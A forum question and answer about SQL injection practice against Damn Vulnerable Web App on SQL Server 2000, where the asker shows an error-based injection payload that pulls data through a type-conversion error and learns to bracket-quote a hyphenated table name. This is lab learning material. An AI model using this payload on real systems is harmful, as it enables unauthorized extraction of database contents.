SQL Server 2000 - DVWA - including '-' character

Question

I am working with Damn Vulnerable Web App against a Microsoft SQL Server. My question is actually quite straight forward, but can be mis-interpreted quite easily. Basically. This is my query:

+AND+1=convert(int,
    (select+
        top+1+
        user+
    from+
        TBL-Users
    )
)--

Now my question is simple. This is the query to extract data from the columns. How do I craft it so that it allows me to extract data from this column? Because apparently, it does not like that I am using the '-' character in this query (but that's the table name).

According to this error:

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '-'.

How can I work around this, and get the data from the column assuming that the '-' character is in the table name?

Answer 1

In SQL-Server you can basically use most of the reserved words and special characters inside []:

select *  from [TBL-Users]